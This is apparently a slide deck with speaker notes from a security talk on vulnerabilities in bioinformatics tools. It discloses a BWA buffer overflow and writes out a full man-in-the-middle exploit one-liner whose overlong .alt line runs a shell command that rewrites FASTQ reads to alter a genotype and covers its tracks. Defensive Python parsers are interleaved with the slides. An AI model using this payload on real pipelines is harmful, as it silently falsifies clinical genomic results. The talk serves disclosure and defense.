From Buffer-Overflowing Genomic
Tools to Securing Biomedical File
Formats
Corey M. Hudson
Charles Fracchia
Corey’s Funding
Supported by the Laboratory Directed Research and
Development program at Sandia National Laboratories, a
multi-mission laboratory managed and operated by National
Technology and Engineering Solutions of Sandia, LLC, a
wholly owned subsidiary of Honeywell International, Inc., for
the U.S. Department of Energy’s National Nuclear Security
Administration under contract DE-NA0003525.
What is a Genome’s value?
NHGRI Data (2019)
Illumina (2018)
NHGRI Estimate (2011)
$1,000
Growth Drivers:
Healthcare and Genomics
Athreya et al., 2019
Growth Drivers:
Industry, SynBio & Genomics
What issues has this growth created?
Broad Institute Best-Practices Pipeline
ARPANET (1971)
Change in trust model
Need for standardization & automation
Bio is turning Digital
Observation: manual
Subject Selection: manual
Analysis: manual
Bio is turning Digital
Observation: automated
Subject Selection: automated
Analysis: automated
The Bio-Digital “Stack”
Design Build Test
Analyze
digital input
output
Critical Workflows rely on digital tools
Then?
Where do these tools come from?
Academia
Business
.NET Bio
AMPHORA
Anduril
Ascalaph Designer
AutoDock
Avogadro
Bioclipse
Bioconductor
BioJava
BioJS
BioMOBY
BioPerl
https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software
BioPHP
Biopython
BioRuby
CP2K
EMBOSS
Galaxy
GenePattern
Geworkbench
GMOD
GenGIS
Genomespace
GENtle
GROMACS
IntGenomeBrows
InterMine
LabKey Server
LAMMPS
mothur
PathVisio
Orange
Staden Package
Taverna workbench
UGENE
Unipept
VOTCA
Just alignment software!
Academia
Business
BLAST
CS-BLAST
CUDASW++
DIAMOND
FASTA
GGSEARCH, GLSEARCH
Genoogle
HMMER
HH-suite
IDF
Infernal
KLAST
LAMBDA
MMseqs2
USEARCH
OSWALD
parasail
PSI-BLAST
PSI-Search
ScalaBLAST
Sequilab
SAM
SSEARCH
SWAPHI
SWAPHI-LS
SWIMM
SWIPE
ACANA
AlignMe
ALLALIGN
Bioconductor
BioPerl dpAlign
BLASTZ, LASTZ
CUDAlign
DNADot
DNASTAR
DOTLET
FEAST
Genome Compiler
G-PAS
GapMis
GGSEARCH, GLSEARCH
JAligner
K*Sync
LALIGN
NW-align
mAlign
matcher
MCALIGN2
MUMmer
needle
Ngila
NW
parasail
Path
PatternHunter
https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software
ProbA
PyMOL
REPuter
SABERTOOTH
Satsuma
SEQALN
SIM, GAP, NAP, LAP
SIM
SPA: Super pairwise alignment
SSEARCH
Sequences Studio
SWIFT suit
stretcher
tranalign
UGENE
water
wordmatch
YASS
ABA
ALE
ALLALIGN
AMAP
BAli-Phy
Base-By-Base
CHAOS, DIALIGN
ClustalW
CodonCode Aligner
Compass
DECIPHER
DIALIGN-TX
DNA Alignment
DNA
DNADynamo
DNASTAR
EDNA
FAMSA
FSA
Geneious
Kalign
MAFFT
MARNA
MAVID
MSA
MSAProbs
MULTALIN
Multi-LAGAN
MUSCLE
Opal
Pecan
Phylo
PMFastR
Praline
PicXAA
POA
Probalign
ProbCons
PROMALS3D
PRRN/PRRP
PSAlign
RevTrans
SAGA
SAM
Se-Al
StatAlign
Stemloc
T-Coffee
UGENE
VectorFriends
GLProbs
ACT
AVID
BLAT
DECIPHER
FLAK
GMAP
Splign
Mauve
MGA
Mulan
Multiz
PLAST-ncRNA
Sequerome
Sequilab
Shuffle-LAGAN
SIBsim4, Sim4
SLAM
PMS
FMM
BLOCKS
eMOTIF
Gibbs motif sampler
HMMTOP
I-sites
JCoils
MEME/MAST
CUDA-MEME
MERCI
PHI-Blast
Phyloscan
PRATT
ScanProsite
TEIRESIAS
BASALT
Arioc
BarraCUDA
BBMap
BFAST
BigBWA
BLASTN
BLAT
Bowtie
BWA
BWA-PSSM
CASHX
Cloudburst
CUDA-EC
CUSHAW
CUSHAW2
CUSHAW2-GPU
CUSHAW3
drFAST
ELAND
ERNE
GASSST
GEM
Genalice MAP
Geneious Assembler
GensearchNGS
GMAP
GNUMAP
HIVE-hexagon
IMOS
LAST
MAQ
mrFAST
MOM
MOSAIK
MPscan
Novoalign
NextGENe
NextGenMap
Omixon Variant Toolkit
PALMapper
Partek Flow
PASS
PerM
PRIMEX
QPalma
RazerS
REAL
RMAP
rNA
RTG Investigator
Segemehl
SeqMap
Shrec
SHRiMP
SLIDER
SOAP
SOCS
SparkBWA
SSAHA, SSAHA2
Stampy
SToRM
Taipan
UGENE
VelociMapper
XpressAlign
ZOOM
Where do these tools come from?
Academia
Business
Instrument Software
Electronic Lab Notebooks
SpotFire
Geneious
FlowJo
PEAKS
IPA
LaserGene
Geneious
SnapGene
Gene Construction Kit
Sequencher
CodonCode Aligner
Ingenuity Pathway Analysis
GeneSpring
JMP Genomics
Genevestigator
GeneMarker
PeakScanner
GenomeStudio
Analyst
Metamorph
Volocity
Avizo
MicroView
FCS Express
Genomics Data: A Primer
Data Flows
Data Pipelines
Hacking the Raw Data to Change a Clinical Outcome
Software Pipeline
First tool in the pipeline - BWA
1. BWA takes FASTQ files as input and maps the reads to a reference genome, creating a SAM file
2. In 2014, the BWA developers added ALT-aware mapping, which lets users map reads to a population rather than to a single canonical reference
3. Because the population is always changing and requires up-to-date knowledge, the reference is hosted at a central repository
4. BWA provides a tool, bwa.kit, which fetches this data from the US National Center for Biotechnology Information (NCBI). NCBI stores and delivers these files as a tarred and gzipped directory of indices: ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_for_alignment_pipelines.ucsc_ids/
5. The user then unzips and stores the indices provided by NCBI
6. A .alt file is used to index the genome and make it ALT-aware
BWA and the Outside World
A Native BWA Vulnerability
If a .alt file has a line >1024 bytes, it will overflow here
1024 byte buffer
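The overflow condition above can be checked defensively before a .alt file ever reaches the aligner. The following is a minimal sketch in Python, not BWA's own code: the function name `find_overlong_lines` is hypothetical, and treating the 1024-byte limit as excluding the line terminator is an assumption.

```python
import io

MAX_LINE_BYTES = 1024  # buffer size quoted on the slide


def find_overlong_lines(stream, limit=MAX_LINE_BYTES):
    """Return 1-based numbers of lines whose content exceeds `limit` bytes.

    `stream` is a binary file-like object. Reads are capped so that a
    hostile file with one enormous line cannot exhaust memory.
    """
    overlong = []
    line_no = 0
    cap = limit + 2  # room for `limit` bytes of content plus "\r\n"
    while True:
        chunk = stream.readline(cap)
        if not chunk:
            break  # end of file
        line_no += 1
        complete = chunk.endswith(b"\n")
        if chunk.endswith(b"\r\n"):
            content_len = len(chunk) - 2
        elif complete:
            content_len = len(chunk) - 1
        else:
            content_len = len(chunk)
        if content_len > limit:
            overlong.append(line_no)
        # Skip the rest of a line that did not fit in one capped read.
        while not complete:
            chunk = stream.readline(cap)
            if not chunk:
                break
            complete = chunk.endswith(b"\n")
    return overlong


if __name__ == "__main__":
    sample = b"chr1_alt\t0\tchr1\n" + b"A" * 2000 + b"\n"
    print(find_overlong_lines(io.BytesIO(sample)))
```

For a file on disk, open it in binary mode (`open(path, "rb")`) and pass the handle in. A non-empty result means the file should be rejected rather than parsed.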
Overflowing the buffer
Database indices are delivered unencrypted over FTP
FTP Protocol: no checksums
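Because the transfer carries no integrity check, one common countermeasure is to compare the downloaded archive against a digest obtained through a separate trusted channel. The sketch below assumes such a SHA-256 digest exists; the slides do not say that one is published, and the function names are hypothetical.

```python
import hashlib
import hmac
import io


def sha256_of_stream(stream, chunk_size=1 << 20):
    """Hash a binary stream in chunks so large index archives need not fit in memory."""
    digest = hashlib.sha256()
    for block in iter(lambda: stream.read(chunk_size), b""):
        digest.update(block)
    return digest.hexdigest()


def matches_published_digest(stream, expected_hex):
    """Return True only if the stream's SHA-256 equals the trusted hex digest."""
    actual = sha256_of_stream(stream)
    # compare_digest avoids leaking the mismatch position through timing.
    return hmac.compare_digest(actual, expected_hex.strip().lower())


if __name__ == "__main__":
    payload = b"stand-in for a downloaded index archive"
    trusted = hashlib.sha256(payload).hexdigest()
    print(matches_published_digest(io.BytesIO(payload), trusted))
    print(matches_published_digest(io.BytesIO(payload + b"X"), trusted))
```

A digest fetched over the same unauthenticated channel as the data adds little, since an attacker in the middle can rewrite both. The check is only as strong as the channel that delivers the expected value.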
Modeling the delivery
Crafting an exploit
After the data are mapped, turn a single A at a particular position in the genome into a C.
Limits
No other data in the genome can be harmed (can’t turn all A’s to C’s)
Must change raw data (make it invisible in follow-on analysis)
How to target the position – PCR trick
Running Polymerase Chain Reaction (PCR) requires primers
If you wish to find a particular nucleotide in the genome, you need primers up and downstream of the nucleotide of interest
Chose A at position 64,544,989 on chromosome 12
Random choice (not clinically meaningful)
7 base pairs upstream and 9 base pairs downstream are sufficient to be nearly unique
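A rough back-of-the-envelope check of the "nearly unique" claim: 7 upstream bases, the target base, and 9 downstream bases give a 17-base motif. The sketch below assumes a genome of about 3.1 billion bases with uniformly random composition. Both are simplifying assumptions not stated on the slides, and real genomes contain repeats that make some motifs far more common.

```python
GENOME_LENGTH_BP = 3_100_000_000  # assumed approximate human genome size
UPSTREAM_BP = 7
DOWNSTREAM_BP = 9


def expected_random_matches(motif_length, genome_length=GENOME_LENGTH_BP):
    """Expected occurrences of one fixed motif on one strand of a uniform random sequence."""
    positions = genome_length - motif_length + 1
    return positions / 4 ** motif_length


# Flanks plus the targeted nucleotide itself.
motif_length = UPSTREAM_BP + 1 + DOWNSTREAM_BP

if __name__ == "__main__":
    print(motif_length)
    print(4 ** motif_length)
    print(round(expected_random_matches(motif_length), 3))
```

Under these assumptions the expected number of chance matches is well below one, which is consistent with the slide's claim. Any position in the motif left as a wildcard raises that expectation by a factor of four.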
Full exploit delivered over MitM
python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 +
'/bin/bash -c “sed -i
s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ;
mv .hiddenAltOrig
"GCA_000001405.15_GRCh38_full_analysis_set.fna.alt";
cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash >
GCA_000001405.15_GRCh38_full_analysis_set.fna.alt
Exploit only runs once, but changes all .fq files
Aftermath – Finish analysis
Three experiments
Setup: 3 sets of simulated reads in data directory – finalizing as simulated_reads{A,B,C}.vcf
1. Unpatched – no exploit
2. Unpatched – Payload: sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g
3. Patched – Payload
Output of no exploit
Reference: Genotype AA at chromosome 12 position 64544989, position 64544989 absent from variants or A
Output of PayloadA – AC one-direction
Reference: Genotype AA at chromosome 12 position 64544989 – output Genotype AC
Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
Output of patched file
Instrument List (excerpt)
Sequencer
Mass Spectrometer
Chromatographer
Blood Gas Analyzer
Bioreactor
Filtration Machine
Cell Counter
Syringe Pumps
Centrifuges
Incubators
Electrophoresis
Gel Imagers
Microarray
Blood Culture
Robotic Liquid Handlers
Electroporators
Microscopes
Scales
Freezers / Fridges
Flow Cytometers
Digital Pathology
High Content Imagers
Thermocyclers
digital input
digital output
The Bio-Digital “Stack”
Design Build Test
Analyze
digital input
output
firmware &
OS
software &
file formats
Vulnerability Landscape
software
buffer overflows, file corruption, etc
firmware
file formats
OS
privilege escalation, remote code execution
biological DoS, financial attack
…
Vulnerability Landscape
OS
Windows XP
HAS to be connected
& using SMBv1
A unique constraint of CyberBioSec
Scientist vs IT
What needs to happen, starting now
1. Hardened parsers for common formats
2. Bug bounties for key software
3. Instrument manufacturers should publish file format specs & parser code
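As one illustration of what a "hardened parser" might look like, here is a minimal sketch of a strict reader for four-line FASTQ records. It is an assumption-laden example, not a reference implementation: the names, the 64 KiB line cap, and the ACGTN alphabet are illustrative choices, and multi-line (wrapped) FASTQ is deliberately rejected.

```python
import io

MAX_LINE_BYTES = 1 << 16            # assumed cap on any single line, terminator included
ALLOWED_BASES = frozenset(b"ACGTN")  # assumed alphabet; IUPAC codes are not accepted


class FastqFormatError(ValueError):
    """Raised when input does not conform to the strict four-line layout."""


def _read_line(stream, limit):
    """Read one line with a hard size cap; return None at end of file."""
    raw = stream.readline(limit + 1)
    if not raw:
        return None
    if len(raw) > limit:
        raise FastqFormatError("line exceeds %d bytes" % limit)
    return raw.rstrip(b"\r\n")


def parse_fastq(stream, limit=MAX_LINE_BYTES):
    """Yield (name, sequence, quality) from a binary stream, validating every field."""
    while True:
        header = _read_line(stream, limit)
        if header is None:
            return
        seq = _read_line(stream, limit)
        plus = _read_line(stream, limit)
        qual = _read_line(stream, limit)
        if seq is None or plus is None or qual is None:
            raise FastqFormatError("truncated record")
        if not header.startswith(b"@"):
            raise FastqFormatError("header must start with '@'")
        if not plus.startswith(b"+"):
            raise FastqFormatError("separator must start with '+'")
        if not set(seq) <= ALLOWED_BASES:
            raise FastqFormatError("unexpected character in sequence")
        if len(qual) != len(seq):
            raise FastqFormatError("quality and sequence lengths differ")
        if not all(33 <= q <= 126 for q in qual):
            raise FastqFormatError("quality outside printable ASCII")
        yield header[1:].decode("ascii", "replace"), seq.decode("ascii"), qual.decode("ascii")


if __name__ == "__main__":
    demo = io.BytesIO(b"@read1\nACGT\n+\nIIII\n")
    for record in parse_fastq(demo):
        print(record)
```

The design choice is to fail closed: every length is bounded before it is used, and anything outside the expected layout raises an error instead of being passed downstream.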
Asks
Wanna fund bug bounties? Come talk to us
Instrument Vendors, come talk to us
Send us sample files!
https://bit.ly/2yxzy8I
From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats

  • 1. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia
  • 2. Corey’s Funding Supported by the Laboratory Directed Research and Development program at Sandia National Laboratories, a multi-mission laboratory managed and operated by National Technology and Engineering Solutions of Sandia, LLC, a wholly owned subsidiary of Honeywell International, Inc., for the U.S. Department of Energy’s National Nuclear Security Administration under contract DE-NA0003525.
  • 3. What is a Genome’s value? NHGRI Data (2019) Illumina (2018) NHGRI Estimate (2011) $1,000
  • 4. Growth Drivers: Healthcare and Genomics Athreya et al., 2019
  • 6. What issues has this growth created? BROAD Institute Best-Practices Pipeline ARPANET (1971) Change in trust model Need for standardization & automation
  • 7. Bio is turning Digital: Observation, Subject Selection, Analysis (each manual)
  • 8. Bio is turning Digital: Observation, Subject Selection, Analysis (each automated)
  • 9. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  • 10. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  • 11. Critical Workflows rely on digital tools
  • 12. Critical Workflows rely on digital tools Then?
  • 13. Where do these tools come from? Academia Business
  • 14. Where do these tools come from? Academia Business .NET Bio AMPHORA Anduril Ascalaph Designer AutoDock Avogadro Bioclipse Bioconductor BioJava BioJS BioMOBY BioPerl https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software BioPHP Biopython BioRuby CP2K EMBOSS Galaxy GenePattern Geworkbench GMOD GenGIS Genomespace GENtle GROMACS IntGenomeBrows InterMine LabKey Server LAMMPS mothur PathVisio Orange Staden Package Taverna workbench UGENE Unipept VOTCA
  • 15. Just alignment software! Academia Business BLAST CS-BLAST CUDASW++ DIAMOND FASTA GGSEARCH, GLSEARCH Genoogle HMMER HH-suite IDF Infernal KLAST LAMBDA MMseqs2 USEARCH OSWALD parasail PSI-BLAST PSI-Search ScalaBLAST Sequilab SAM SSEARCH SWAPHI SWAPHI-LS SWIMM SWIPE ACANA AlignMe ALLALIGN Bioconductor BioPerl dpAlign BLASTZ, LASTZ CUDAlign DNADot DNASTAR DOTLET FEAST Genome Compiler G-PAS GapMis GGSEARCH, GLSEARCH JAligner K*Sync LALIGN NW-align mAlign matcher MCALIGN2 MUMmer needle Ngila NW parasail Path PatternHunter https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software ProbA PyMOL REPuter SABERTOOTH Satsuma SEQALN SIM, GAP, NAP, LAP SIM SPA: Super pairwise alignment SSEARCH Sequences Studio SWIFT suit stretcher tranalign UGENE water wordmatch YASS ABA ALE ALLALIGN AMAP BAli-Phy Base-By-Base CHAOS, DIALIGN ClustalW CodonCode Aligner Compass DECIPHER DIALIGN-TX DNA Alignment DNA DNADynamo DNASTAR EDNA FAMSA FSA Geneious Kalign MAFFT MARNA MAVID MSA MSAProbs MULTALIN Multi-LAGAN MUSCLE Opal Pecan Phylo PMFastR Praline PicXAA POA Probalign ProbCons PROMALS3D PRRN/PRRP PSAlign RevTrans SAGA SAM Se-Al StatAlign Stemloc T-Coffee UGENE VectorFriends GLProbs ACT AVID BLAT DECIPHER FLAK GMAP Splign Mauve MGA Mulan Multiz PLAST-ncRNA Sequerome Sequilab Shuffle-LAGAN SIBsim4, Sim4 SLAM PMS FMM BLOCKS eMOTIF Gibbs motif sampler HMMTOP I-sites JCoils MEME/MAST CUDA-MEME MERCI PHI-Blast Phyloscan PRATT ScanProsite TEIRESIAS BASALT Arioc BarraCUDA BBMap BFAST BigBWA BLASTN BLAT Bowtie BWA BWA-PSSM CASHX Cloudburst CUDA-EC CUSHAW CUSHAW2 CUSHAW2-GPU CUSHAW3 drFAST ELAND ERNE GASSST GEM Genalice MAP Geneious Assembler GensearchNGS GMAP GNUMAP HIVE-hexagon IMOS LAST MAQ mrFAST MOM MOSAIK MPscan Novoalign NextGENe NextGenMap Omixon Variant Toolkit PALMapper Partek Flow PASS PerM PRIMEX QPalma RazerS REAL RMAP rNA RTG Investigator Segemehl SeqMap Shrec SHRiMP SLIDER SOAP SOCS SparkBWA SSAHA, SSAHA2 Stampy SToRM Taipan UGENE VelociMapper XpressAlign ZOOM
  • 16. Where do these tools come from? Academia Business Instrument Software Electronic Lab Notebooks SpotFire Geneious FlowJo PEAKS IPA LaserGene Geneious SnapGene Gene Construction Kit Sequencher CodonCode Aligner Ingenuity Pathway Analysis GeneSpring JMP Genomics Genevestigator GeneMarker PeakScanner GenomeStudio Analyst Metamorph Volocity Avizo MicroView FCS Express
  • 17. Just alignment software! Academia Business (repeats the alignment-software list from slide 15)
  • 18. Genomics Data: A Primer Data Flows Data Pipelines
  • 19. Hacking the Raw Data to Change a Clinical Outcome
  • 21. First tool in the pipeline - BWA 1. BWA takes FASTQ files as input and maps these to a reference genome, creating a SAM file. 2. In 2014, BWA developers added ALT-aware mapping, which allows users to map reads to a population rather than to a single canonical reference. 3. Since the population is always changing and requires up-to-date knowledge, the reference is hosted at a central repository. 4. BWA provides a tool, bwa.kit, which accesses this data from the US National Center for Biotechnology Information (NCBI), which stores and delivers these files as a tarred and gzipped directory of indices: ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_for_alignment_pipelines.ucsc_ids/ 5. The user then unzips and stores the indices provided by NCBI. 6. A .alt file is used to index the genome and make it alt-aware.
  • 22. BWA and the Outside World
  • 23. A Native BWA Vulnerability: if a .alt file has a line longer than 1024 bytes, it will overflow the 1024-byte buffer highlighted in the code on the slide
  • 25. Database indices are delivered unencrypted over FTP. FTP protocol: no checksums
  • 27. Crafting an exploit: after the data are mapped, turn a single A at a particular position in the genome into a C. Limits: no other data in the genome can be harmed (can’t turn all A’s to C’s); must change the raw data (making the change invisible in follow-on analysis).
  • 28. How to target the position – PCR trick: Running Polymerase Chain Reaction (PCR) requires primers. If you wish to find a particular nucleotide in the genome, you need primers upstream and downstream of the nucleotide of interest. We chose the A at position 64,544,989 on chromosome 12, a random choice (not clinically meaningful). 7 base pairs upstream and 9 base pairs downstream are sufficient to be nearly unique.
  • 29. Full exploit delivered over MitM: python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 + '/bin/bash -c “sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ; mv .hiddenAltOrig "GCA_000001405.15_GRCh38_full_analysis_set.fna.alt"; cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash > GCA_000001405.15_GRCh38_full_analysis_set.fna.alt Note: the exploit runs only once, but changes all .fq files
  • 31. Three experiments. Setup: 3 sets of simulated reads in the data directory, finalizing as simulated_reads{A,B,C}.vcf. 1. Unpatched, no exploit. 2. Unpatched, payload: sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g 3. Patched, payload.
  • 32. Output with no exploit. Reference: genotype AA at chromosome 12 position 64544989; in the output, position 64544989 is either absent from the variants or called as A.
  • 33. Output of PayloadA – AC one-direction Reference: Genotype AA at chromosome 12 position 64544989 – output Genotype AC Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
  • 35. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  • 36. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers
  • 37. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital input
  • 38. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital output
  • 39. The Bio-Digital “Stack” Design Build Test Analyze digital input output firmware & OS software & file formats firmware & OS software & file formats
  • 40. Vulnerability Landscape software buffer overflows, file corruption, etc firmware file formats OS privilege escalation, remote code execution biological DoS, financial attack …
  • 41. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  • 42. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  • 43. A unique constraint of CyberBioSec Scientist vs IT
  • 44. What needs to happen, starting now 1. Hardened parsers for common formats 2. Bug bounties for key software 3. Instrument manufacturers should publish file format specs & parser code
  • 45. Asks: Wanna fund bug bounties? Come talk to us. Instrument vendors, come talk to us. Send us sample files! https://bit.ly/2yxzy8I
  • 46. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia
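
The overflow condition on slide 23 (a .alt line longer than the 1024-byte buffer) is the kind of input that a hardened parser, as asked for on slide 44, would reject before the data reaches the aligner. A minimal Python sketch of such a pre-check follows. The function name `find_oversized_lines` and the decision to also flag lines of exactly 1024 bytes (to leave room for a C string terminator) are illustrative assumptions, not BWA's actual patch.

```python
import io

MAX_LINE_BYTES = 1024  # buffer size named on slide 23


def find_oversized_lines(stream, limit=MAX_LINE_BYTES):
    """Return (line_number, length) for each line too long for a `limit`-byte buffer.

    `stream` is any binary file-like object. Lengths are counted in bytes and
    exclude the trailing newline.
    """
    oversized = []
    for line_number, raw in enumerate(stream, start=1):
        length = len(raw.rstrip(b"\r\n"))
        # Assumption: a C buffer of `limit` bytes holds at most limit - 1
        # characters plus the terminating NUL, so `limit` itself is flagged too.
        if length >= limit:
            oversized.append((line_number, length))
    return oversized
```

Opening a freshly downloaded .alt file in binary mode, passing it to this function, and refusing to proceed when the returned list is non-empty is one cheap guard. It does not replace fixing the unbounded read in the tool itself.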

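Slide 25 points out that the indices arrive over unencrypted FTP with no checksums. One common mitigation, sketched here under assumptions, is to compare a locally computed digest with a reference value obtained over a separate, authenticated channel. The choice of SHA-256 and the helper names `sha256_of_file` and `verify_download` are hypothetical; the slides do not prescribe a specific scheme.

```python
import hashlib
import hmac


def sha256_of_file(path, chunk_size=1 << 20):
    """Compute the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_download(path, expected_hex):
    """Return True only if the file's digest matches the trusted reference value.

    `expected_hex` must come from a channel the attacker cannot modify;
    a checksum fetched over the same FTP session offers no protection.
    """
    actual = sha256_of_file(path)
    return hmac.compare_digest(actual, expected_hex.strip().lower())
```

A pipeline could call `verify_download` on the downloaded archive and stop before unpacking if it returns False.
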
Editor's notes

  1. Thoughts on overall structure: Intro of who we are and disclaimer on Sandia funding. Genome’s value and the pressure created by this growth. This has led to a total dependence on digital tools: biomedical research has now reached a stage where digital tools are ubiquitous and cannot be removed. HOWEVER, these tools primarily come from Academia, are poorly supported, often BOTH. Show the disparity with “industrial tools”; talk about what BB sees in the field: companies having to build their own tooling, often cobbled together from open-source tools, with VERY little-to-no sensitivity to or expertise in infosec. End with the long list of open-source ALIGNMENT software and highlight BWA. [SEGUE for Corey] Talk about the vulnerability and its context, the chained attack vector, and the result! PAUSE for effect. Return to the diagram of the fully automated biomed near future and show how each link in the chain can be a vector of attack. Link to the wider problem. Show the list of instrumentation that we often see in labs and outline the ones with INPUTS and OUTPUTS. Explain how large volumes of data (OUTPUTS) further increase reliance on digital tools and how integrity is key. Hint at the project to identify and patch vulnerabilities in bio file formats. Ask for people to contribute expertise and sample file formats.
  2. Since the birth of modern biomedicine as an observable science in the 16th century, biomedicine has been dominated by manual processes. However, we are now at a crucial inflection point for the field, thanks to automation and digital tools finally becoming available.
  3. Critical Workflows rely on digital tools Kiestra TLA on left – from Automation in Clinical Microbiology in ASM Journal of Clinical Microbiology https://doi.org/10.1128/JCM.00301-13 BROAD Somatic Cell Line Pipeline on right
  4. Critical Workflows rely on digital tools Kiestra TLA on left – from Automation in Clinical Microbiology in ASM Journal of Clinical Microbiology https://doi.org/10.1128/JCM.00301-13 BROAD Somatic Cell Line Pipeline on right
  5. Imagine if your LIQUID HANDLER goes down SEQUENCER IMAGER ELECTRONIC LAB NOTEBOOK
  6. Imagine if your LIQUID HANDLER goes down SEQUENCER IMAGER ELECTRONIC LAB NOTEBOOK
  7. Critical Workflows rely on digital tools